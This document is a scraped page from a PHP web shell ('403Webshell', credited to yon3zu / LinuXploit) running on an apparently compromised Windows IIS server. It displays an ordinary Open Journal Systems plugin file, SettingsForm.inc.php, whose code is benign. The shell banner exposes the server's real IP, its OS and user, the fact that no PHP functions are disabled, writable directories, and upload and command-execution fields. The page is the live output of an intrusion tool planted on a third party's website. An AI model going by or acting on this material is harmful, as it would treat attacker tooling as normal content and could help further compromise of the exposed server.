403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/Topogeo/ojs/plugins/generic/customBlockManager/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/inetpub/wwwroot/Topogeo/ojs/plugins/generic/customBlockManager//SettingsForm.inc.php
<?php

/**
 * @file SettingsForm.inc.php
 *
 * Copyright (c) 2003-2012 John Willinsky. For full terms see the file docs/COPYING.
 *
 * @class SettingsForm
 *
 * @brief Form for journal managers to add or delete sidebar blocks
 *
 */

import('lib.pkp.classes.form.Form');

class SettingsForm extends Form {
	/** @var $journalId int */
	var $journalId;

	/** @var $plugin object */
	var $plugin;

	/** $var $errors string */
	var $errors;

	/**
	 * Constructor
	 * @param $journalId int
	 */
	function SettingsForm(&$plugin, $journalId) {

		parent::Form($plugin->getTemplatePath() . 'settingsForm.tpl');

		$this->journalId = $journalId;
		$this->plugin =& $plugin;

	}

	/**
	 * Initialize form data from  the plugin settings to the form
	 */
	function initData() {
		$journalId = $this->journalId;
		$plugin =& $this->plugin;

		$templateMgr =& TemplateManager::getManager();

		$blocks = $plugin->getSetting($journalId, 'blocks');

		if ( !is_array($blocks) ) {
			$this->setData('blocks', array());
		} else {
			$this->setData('blocks', $blocks);
		}
	}

	/**
	 * Assign form data to user-submitted data.
	 */
	function readInputData() {
		$this->readUserVars(
			array(
				'blocks',
				'deletedBlocks'
			)
		);
	}

	/**
	 * Update the plugin settings
	 */
	function execute() {
		$plugin =& $this->plugin;
		$journalId = $this->journalId;

		$pluginSettingsDAO =& DAORegistry::getDAO('PluginSettingsDAO');

		$deletedBlocks = explode(':',$this->getData('deletedBlocks'));
		foreach ($deletedBlocks as $deletedBlock) {
			$pluginSettingsDAO->deleteSetting($journalId, $deletedBlock.'CustomBlockPlugin', 'enabled');
			$pluginSettingsDAO->deleteSetting($journalId, $deletedBlock.'CustomBlockPlugin', 'seq');
			$pluginSettingsDAO->deleteSetting($journalId, $deletedBlock.'CustomBlockPlugin', 'context');
			$pluginSettingsDAO->deleteSetting($journalId, $deletedBlock.'CustomBlockPlugin', 'blockContent');
		}

		//sort the blocks in alphabetical order
		$blocks = $this->getData('blocks');
		ksort($blocks);

		//remove any blank entries that made it into the array
		foreach ($blocks as $key => $value) {
			if (is_null($value) || trim($value)=="") {
				unset($blocks[$key]);
			}
		}

		// Update blocks
		$plugin->updateSetting($journalId, 'blocks', $blocks);
		$this->setData('blocks',$blocks);
	}
}

?>

Youez - 2016 - github.com/yon3zu
LinuXploit